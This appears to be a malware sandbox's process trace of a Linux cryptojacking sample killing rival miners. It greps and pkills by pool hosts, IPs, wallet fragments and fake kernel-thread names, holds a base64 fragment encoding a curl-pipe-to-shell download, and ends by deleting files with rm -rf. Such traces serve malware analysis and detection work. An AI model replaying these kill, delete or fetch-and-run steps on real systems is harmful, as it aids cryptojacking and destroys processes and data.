- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1464
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1463
- /bin/grep
  grep curl
  2⤵
  PID:1462
- /bin/grep
  grep ficov
  2⤵
  PID:1461
- /bin/grep
  grep -v grep
  2⤵
  PID:1460
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1459
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1470
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1469
- /bin/grep
  grep wget
  2⤵
  PID:1468
- /bin/grep
  grep he.sh
  2⤵
  PID:1467
- /bin/grep
  grep -v grep
  2⤵
  PID:1466
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:1465
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1476
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1475
- /bin/grep
  grep curl
  2⤵
  PID:1474
- /bin/grep
  grep he.sh
  2⤵
  PID:1473
- /bin/grep
  grep -v grep
  2⤵
  PID:1472
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:1471
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1482
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1481
- /bin/grep
  grep wget
  2⤵
  PID:1480
- /bin/grep
  grep miner.sh
  2⤵
  PID:1479
- /bin/grep
  grep -v grep
  2⤵
  PID:1478
- /bin/ps
  ps aux
  2⤵
  PID:1477
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1487
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1488
- /bin/grep
  grep curl
  2⤵
  PID:1486
- /bin/grep
  grep miner.sh
  2⤵
  PID:1485
- /bin/grep
  grep -v grep
  2⤵
  PID:1484
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1483
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1494
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1493
- /bin/grep
  grep wget
  2⤵
  PID:1492
- /bin/grep
  grep nullcrew
  2⤵
  PID:1491
- /bin/grep
  grep -v grep
  2⤵
  PID:1490
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1489
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1499
- /bin/grep
  grep curl
  2⤵
  PID:1498
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1500
- /bin/grep
  grep nullcrew
  2⤵
  PID:1497
- /bin/grep
  grep -v grep
  2⤵
  PID:1496
- /bin/ps
  ps aux
  2⤵
  PID:1495
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1505
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1504
- /bin/grep
  grep 107.174.47.156
  2⤵
  PID:1503
- /bin/grep
  grep -v grep
  2⤵
  PID:1502
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1501
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1510
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1509
- /bin/grep
  grep 83.220.169.247
  2⤵
  PID:1508
- /bin/grep
  grep -v grep
  2⤵
  PID:1507
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1506
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1515
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1514
- /bin/grep
  grep 51.38.203.146
  2⤵
  PID:1513
- /bin/grep
  grep -v grep
  2⤵
  PID:1512
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:1511
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1519
- /bin/grep
  grep 144.217.45.45
  2⤵
  PID:1518
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1520
- /bin/grep
  grep -v grep
  2⤵
  PID:1517
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  - Reads runtime system information
  PID:1516
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1525
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1524
- /bin/grep
  grep 107.174.47.181
  2⤵
  PID:1523
- /bin/grep
  grep -v grep
  2⤵
  PID:1522
- /bin/ps
  ps aux
  2⤵
  PID:1521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1530
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1529
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1528
- /bin/grep
  grep -v grep
  2⤵
  PID:1527
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:1526
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1535
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1534
- /bin/grep
  grep mine.moneropool.com
  2⤵
  PID:1533
- /bin/grep
  grep -v grep
  2⤵
  PID:1532
- /bin/ps
  ps auxf
  2⤵
  PID:1531
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1540
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1539
- /bin/grep
  grep pool.t00ls.ru
  2⤵
  PID:1538
- /bin/grep
  grep -v grep
  2⤵
  PID:1537
- /bin/ps
  ps auxf
  2⤵
  PID:1536
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1545
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1544
- /bin/grep
  grep xmr.crypto-pool.fr:8080
  2⤵
  PID:1543
- /bin/grep
  grep -v grep
  2⤵
  PID:1542
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1541
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1550
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1549
- /bin/grep
  grep xmr.crypto-pool.fr:3333
  2⤵
  PID:1548
- /bin/grep
  grep -v grep
  2⤵
  PID:1547
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1546
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1555
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1554
- /bin/grep
  grep "[email protected]"
  2⤵
  PID:1553
- /bin/grep
  grep -v grep
  2⤵
  PID:1552
- /bin/ps
  ps auxf
  2⤵
  PID:1551
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1560
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1559
- /bin/grep
  grep monerohash.com
  2⤵
  PID:1558
- /bin/grep
  grep -v grep
  2⤵
  PID:1557
- /bin/ps
  ps auxf
  2⤵
  PID:1556
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1565
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1564
- /bin/grep
  grep /tmp/a7b104c270
  2⤵
  PID:1563
- /bin/grep
  grep -v grep
  2⤵
  PID:1562
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1561
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1570
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1569
- /bin/grep
  grep xmr.crypto-pool.fr:6666
  2⤵
  PID:1568
- /bin/grep
  grep -v grep
  2⤵
  PID:1567
- /bin/ps
  ps auxf
  2⤵
  PID:1566
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1575
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1574
- /bin/grep
  grep xmr.crypto-pool.fr:7777
  2⤵
  PID:1573
- /bin/grep
  grep -v grep
  2⤵
  PID:1572
- /bin/ps
  ps auxf
  2⤵
  - Reads CPU attributes
  PID:1571
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1580
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1579
- /bin/grep
  grep xmr.crypto-pool.fr:443
  2⤵
  PID:1578
- /bin/grep
  grep -v grep
  2⤵
  PID:1577
- /bin/ps
  ps auxf
  2⤵
  PID:1576
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1585
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1584
- /bin/grep
  grep stratum.f2pool.com:8888
  2⤵
  PID:1583
- /bin/grep
  grep -v grep
  2⤵
  PID:1582
- /bin/ps
  ps auxf
  2⤵
  PID:1581
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1590
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1589
- /bin/grep
  grep xmrpool.eu
  2⤵
  PID:1588
- /bin/grep
  grep -v grep
  2⤵
  PID:1587
- /bin/ps
  ps auxf
  2⤵
  PID:1586
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1595
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1594
- /bin/grep
  grep kieuanilam.me
  2⤵
  PID:1593
- /bin/grep
  grep -v grep
  2⤵
  PID:1592
- /bin/ps
  ps auxf
  2⤵
  PID:1591
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1599
- - /usr/local/sbin/kill
    kill -9 1597
    3⤵
    PID:1600
- - /usr/local/bin/kill
    kill -9 1597
    3⤵
    PID:1600
- - /usr/sbin/kill
    kill -9 1597
    3⤵
    PID:1600
- - /usr/bin/kill
    kill -9 1597
    3⤵
    PID:1600
- - /sbin/kill
    kill -9 1597
    3⤵
    PID:1600
- - /bin/kill
    kill -9 1597
    3⤵
    PID:1600
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1598
- /bin/grep
  grep xiaoyao
  2⤵
  PID:1597
- /bin/ps
  ps auxf
  2⤵
  PID:1596
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1604
- - /usr/local/sbin/kill
    kill -9 1602
    3⤵
    PID:1605
- - /usr/local/bin/kill
    kill -9 1602
    3⤵
    PID:1605
- - /usr/sbin/kill
    kill -9 1602
    3⤵
    PID:1605
- - /usr/bin/kill
    kill -9 1602
    3⤵
    PID:1605
- - /sbin/kill
    kill -9 1602
    3⤵
    PID:1605
- - /bin/kill
    kill -9 1602
    3⤵
    PID:1605
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:1603
- /bin/grep
  grep xiaoxue
  2⤵
  PID:1602
- /bin/ps
  ps auxf
  2⤵
  - Reads runtime system information
  PID:1601
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1611
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1609
- /bin/grep
  grep 46.243.253.15
  2⤵
  PID:1607
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1608
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1610
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1617
- /bin/sed
  sed -e "s/\\/.*//g"
  2⤵
  PID:1616
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:1615
- /bin/grep
  grep "ESTABLISHED\\|SYN_SENT"
  2⤵
  PID:1614
- /bin/grep
  grep 176.31.6.16
  2⤵
  PID:1613
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1619
- /usr/bin/pgrep
  pgrep -f L2Jpbi9iYXN
  2⤵
  PID:1618
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1621
- /usr/bin/pgrep
  pgrep -f xzpauectgr
  2⤵
  PID:1620
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1623
- /usr/bin/pgrep
  pgrep -f slxfbkmxtd
  2⤵
  PID:1622
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1625
- /usr/bin/pgrep
  pgrep -f mixtape
  2⤵
  PID:1624
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1627
- /usr/bin/pgrep
  pgrep -f addnj
  2⤵
  - Reads CPU attributes
  PID:1626
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1629
- /usr/bin/pgrep
  pgrep -f 200.68.17.196
  2⤵
  PID:1628
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1631
- /usr/bin/pgrep
  pgrep -f IyEvYmluL3NoCgpzUG
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1630
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1633
- /usr/bin/pgrep
  pgrep -f KHdnZXQgLXFPLSBodHRw
  2⤵
  PID:1632
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1635
- /usr/bin/pgrep
  pgrep -f FEQ3eSp8omko5nx9e97hQ39NS3NMo6rxVQS3
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1634
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1637
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  - Reads CPU attributes
  PID:1636
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1639
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  PID:1638
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1641
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  PID:1640
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1643
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  PID:1642
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1645
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1644
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1647
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  - Reads runtime system information
  PID:1646
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1649
- /usr/bin/pgrep
  pgrep -f cryptonight
  2⤵
  - Reads CPU attributes
  PID:1648
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1651
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  PID:1650
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1653
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  PID:1652
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1655
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  PID:1654
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1657
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:1656
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1659
- /usr/bin/pgrep
  pgrep -f ./vsp
  2⤵
  - Reads CPU attributes
  PID:1658
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1661
- /usr/bin/pgrep
  pgrep -f ./jvs
  2⤵
  PID:1660
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1663
- /usr/bin/pgrep
  pgrep -f ./pvv
  2⤵
  PID:1662
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1665
- /usr/bin/pgrep
  pgrep -f ./vpp
  2⤵
  PID:1664
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1667
- /usr/bin/pgrep
  pgrep -f ./pces
  2⤵
  PID:1666
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1669
- /usr/bin/pgrep
  pgrep -f ./rspce
  2⤵
  PID:1668
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1671
- /usr/bin/pgrep
  pgrep -f ./haveged
  2⤵
  - Reads runtime system information
  PID:1670
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1673
- /usr/bin/pgrep
  pgrep -f ./jiba
  2⤵
  PID:1672
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1675
- /usr/bin/pgrep
  pgrep -f ./watchbog
  2⤵
  - Reads CPU attributes
  PID:1674
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1677
- /usr/bin/pgrep
  pgrep -f ./A7mA5gb
  2⤵
  PID:1676
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1679
- /usr/bin/pgrep
  pgrep -f kacpi_svc
  2⤵
  - Reads CPU attributes
  PID:1678
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1681
- /usr/bin/pgrep
  pgrep -f kswap_svc
  2⤵
  PID:1680
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1683
- /usr/bin/pgrep
  pgrep -f kauditd_svc
  2⤵
  - Reads CPU attributes
  PID:1682
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1685
- /usr/bin/pgrep
  pgrep -f kpsmoused_svc
  2⤵
  - Reads CPU attributes
  PID:1684
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1687
- /usr/bin/pgrep
  pgrep -f kseriod_svc
  2⤵
  PID:1686
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1689
- /usr/bin/pgrep
  pgrep -f kthreadd_svc
  2⤵
  - Reads runtime system information
  PID:1688
- /usr/bin/pgrep
  pgrep -f ksoftirqd_svc
  2⤵
  PID:1690
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1691
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1693
- /usr/bin/pgrep
  pgrep -f kintegrityd_svc
  2⤵
  PID:1692
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1695
- /usr/bin/pgrep
  pgrep -f jawa
  2⤵
  PID:1694
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1697
- /usr/bin/pgrep
  pgrep -f oracle.jpg
  2⤵
  - Reads runtime system information
  PID:1696
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1699
- /usr/bin/pgrep
  pgrep -f 45cToD1FzkjAxHRBhYKKLg5utMGEN
  2⤵
  - Reads runtime system information
  PID:1698
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1701
- /usr/bin/pgrep
  pgrep -f 188.209.49.54
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1700
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1703
- /usr/bin/pgrep
  pgrep -f 181.214.87.241
  2⤵
  - Reads CPU attributes
  PID:1702
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1705
- /usr/bin/pgrep
  pgrep -f etnkFgkKMumdqhrqxZ6729U7bY8pzRjYzGbXa5sDQ
  2⤵
  - Reads CPU attributes
  PID:1704
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1707
- /usr/bin/pgrep
  pgrep -f 47TdedDgSXjZtJguKmYqha4sSrTvoPXnrYQEq2Lbj
  2⤵
  PID:1706
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1709
- /usr/bin/pgrep
  pgrep -f etnkP9UjR55j9TKyiiXWiRELxTS51FjU9e1UapXyK
  2⤵
  PID:1708
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1711
- /usr/bin/pgrep
  pgrep -f servim
  2⤵
  PID:1710
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1713
- /usr/bin/pgrep
  pgrep -f kblockd_svc
  2⤵
  PID:1712
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1715
- /usr/bin/pgrep
  pgrep -f native_svc
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1714
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1717
- /usr/bin/pgrep
  pgrep -f ynn
  2⤵
  PID:1716
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1719
- /usr/bin/pgrep
  pgrep -f 65ccEJ7
  2⤵
  - Reads runtime system information
  PID:1718
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1721
- /usr/bin/pgrep
  pgrep -f jmxx
  2⤵
  PID:1720
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:1723
- /usr/bin/pgrep
  pgrep -f 2Ne80nA
  2⤵
  PID:1722
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1725
- /usr/bin/pgrep
  pgrep -f sysstats
  2⤵
  PID:1724
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1727
- /usr/bin/pgrep
  pgrep -f systemxlv
  2⤵
  - Reads runtime system information
  PID:1726
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1729
- /usr/bin/pgrep
  pgrep -f watchbog
  2⤵
  PID:1728
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:1731
- /usr/bin/pgrep
  pgrep -f OIcJi1m
  2⤵
  PID:1730
- /usr/bin/pkill
  pkill -f biosetjenkins
  2⤵
  PID:1732
- /usr/bin/pkill
  pkill -f Loopback
  2⤵
  PID:1733
- /usr/bin/pkill
  pkill -f apaceha
  2⤵
  PID:1734
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  PID:1735
- /usr/bin/pkill
  pkill -f mixnerdx
  2⤵
  PID:1736
- /usr/bin/pkill
  pkill -f performedl
  2⤵
  PID:1737
- /usr/bin/pkill
  pkill -f JnKihGjn
  2⤵
  PID:1738
- /usr/bin/pkill
  pkill -f irqba2anc1
  2⤵
  PID:1739
- /usr/bin/pkill
  pkill -f irqba5xnc1
  2⤵
  PID:1740
- /usr/bin/pkill
  pkill -f irqbnc1
  2⤵
  PID:1741
- /usr/bin/pkill
  pkill -f ir29xc1
  2⤵
  - Reads CPU attributes
  PID:1742
- /usr/bin/pkill
  pkill -f conns
  2⤵
  PID:1743
- /usr/bin/pkill
  pkill -f irqbalance
  2⤵
  - Reads CPU attributes
  PID:1744
- /usr/bin/pkill
  pkill -f crypto-pool
  2⤵
  PID:1745
- /usr/bin/pkill
  pkill -f XJnRj
  2⤵
  - Reads CPU attributes
  PID:1746
- /usr/bin/pkill
  pkill -f mgwsl
  2⤵
  PID:1747
- /usr/bin/pkill
  pkill -f pythno
  2⤵
  PID:1748
- /usr/bin/pkill
  pkill -f jweri
  2⤵
  PID:1749
- /usr/bin/pkill
  pkill -f lx26
  2⤵
  PID:1750
- /usr/bin/pkill
  pkill -f NXLAi
  2⤵
  PID:1751
- /usr/bin/pkill
  pkill -f BI5zj
  2⤵
  PID:1752
- /usr/bin/pkill
  pkill -f askdljlqw
  2⤵
  PID:1753
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  PID:1754
- /usr/bin/pkill
  pkill -f minergate
  2⤵
  PID:1755
- /usr/bin/pkill
  pkill -f Guard.sh
  2⤵
  PID:1756
- /usr/bin/pkill
  pkill -f ysaydh
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1757
- /usr/bin/pkill
  pkill -f bonns
  2⤵
  PID:1758
- /usr/bin/pkill
  pkill -f donns
  2⤵
  PID:1759
- /usr/bin/pkill
  pkill -f kxjd
  2⤵
  PID:1760
- /usr/bin/pkill
  pkill -f Duck.sh
  2⤵
  PID:1761
- /usr/bin/pkill
  pkill -f bonn.sh
  2⤵
  - Reads runtime system information
  PID:1762
- /usr/bin/pkill
  pkill -f conn.sh
  2⤵
  PID:1763
- /usr/bin/pkill
  pkill -f kworker34
  2⤵
  - Reads CPU attributes
  PID:1764
- /usr/bin/pkill
  pkill -f kw.sh
  2⤵
  PID:1765
- /usr/bin/pkill
  pkill -f pro.sh
  2⤵
  - Reads CPU attributes
  PID:1766
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  - Reads CPU attributes
  PID:1767
- /usr/bin/pkill
  pkill -f acpid
  2⤵
  - Reads runtime system information
  PID:1768
- /usr/bin/pkill
  pkill -f icb5o
  2⤵
  PID:1769
- /usr/bin/pkill
  pkill -f nopxi
  2⤵
  PID:1770
- /usr/bin/pkill
  pkill -f irqbalanc1
  2⤵
  PID:1771
- /usr/bin/pkill
  pkill -f minerd
  2⤵
  - Reads runtime system information
  PID:1772
- /usr/bin/pkill
  pkill -f i586
  2⤵
  PID:1773
- /usr/bin/pkill
  pkill -f gddr
  2⤵
  PID:1774
- /usr/bin/pkill
  pkill -f mstxmr
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1775
- /usr/bin/pkill
  pkill -f ddg.2011
  2⤵
  PID:1776
- /usr/bin/pkill
  pkill -f wnTKYg
  2⤵
  PID:1777
- /usr/bin/pkill
  pkill -f deamon
  2⤵
  PID:1778
- /usr/bin/pkill
  pkill -f disk_genius
  2⤵
  PID:1779
- /usr/bin/pkill
  pkill -f sourplum
  2⤵
  - Reads runtime system information
  PID:1780
- /usr/bin/pkill
  pkill -f polkitd
  2⤵
  PID:1781
- /usr/bin/pkill
  pkill -f nanoWatch
  2⤵
  PID:1782
- /usr/bin/pkill
  pkill -f zigw
  2⤵
  PID:1783
- /usr/bin/pkill
  pkill -f devtool
  2⤵
  - Reads runtime system information
  PID:1784
- /usr/bin/pkill
  pkill -f devtools
  2⤵
  - Reads runtime system information
  PID:1785
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  - Reads CPU attributes
  PID:1786
- /usr/bin/pkill
  pkill -f watchbog
  2⤵
  PID:1787
- /usr/bin/pkill
  pkill -f cryptonight
  2⤵
  PID:1788
- /usr/bin/pkill
  pkill -f sustes
  2⤵
  PID:1789
- /usr/bin/pkill
  pkill -f xmrig
  2⤵
  PID:1790
- /usr/bin/pkill
  pkill -f xmrig-cpu
  2⤵
  PID:1791
- /usr/bin/pkill
  pkill -f 121.42.151.137
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:1792
- /usr/bin/pkill
  pkill -f init12.cfg
  2⤵
  PID:1793
- /usr/bin/pkill
  pkill -f nginxk
  2⤵
  - Reads CPU attributes
  PID:1794
- /usr/bin/pkill
  pkill -f tmp/wc.conf
  2⤵
  - Reads runtime system information
  PID:1795
- /usr/bin/pkill
  pkill -f xmrig-notls
  2⤵
  - Reads CPU attributes
  PID:1796
- /usr/bin/pkill
  pkill -f xmr-stak
  2⤵
  PID:1797
- /usr/bin/pkill
  pkill -f suppoie
  2⤵
  - Reads CPU attributes
  PID:1798
- /usr/bin/pkill
  pkill -f zer0day.ru
  2⤵
  - Reads CPU attributes
  PID:1799
- /usr/bin/pkill
  pkill -f dbus-daemon--system
  2⤵
  PID:1800
- /usr/bin/pkill
  pkill -f nullcrew
  2⤵
  PID:1801
- /usr/bin/pkill
  pkill -f systemctI
  2⤵
  PID:1802
- /usr/bin/pkill
  pkill -f kworkerds
  2⤵
  PID:1803
- /usr/bin/pkill
  pkill -f init10.cfg
  2⤵
  - Reads CPU attributes
  PID:1804
- /usr/bin/pkill
  pkill -f /wl.conf
  2⤵
  PID:1805
- /usr/bin/pkill
  pkill -f crond64
  2⤵
  PID:1806
- /usr/bin/pkill
  pkill -f sustse
  2⤵
  PID:1807
- /usr/bin/pkill
  pkill -f vmlinuz
  2⤵
  PID:1808
- /usr/bin/pkill
  pkill -f exin
  2⤵
  - Reads CPU attributes
  PID:1809
- /usr/bin/pkill
  pkill -f apachiii
  2⤵
  - Reads runtime system information
  PID:1810
- /usr/bin/pkill
  pkill -f svcworkmanager
  2⤵
  PID:1811
- /usr/bin/pkill
  pkill -f xr
  2⤵
  - Reads CPU attributes
  PID:1812
- /usr/bin/pkill
  pkill -f trace
  2⤵
  PID:1813
- /usr/bin/pkill
  pkill -f svcupdate
  2⤵
  - Reads CPU attributes
  PID:1814
- /usr/bin/pkill
  pkill -f networkmanager
  2⤵
  PID:1815
- /usr/bin/pkill
  pkill -f phpupdate
  2⤵
  PID:1816
- /bin/rm
  rm -rf /usr/bin/config.json
  2⤵
  PID:1817
- /bin/rm
  rm -rf /usr/bin/exin
  2⤵
  PID:1818
- /bin/rm
  rm -rf /tmp/wc.conf
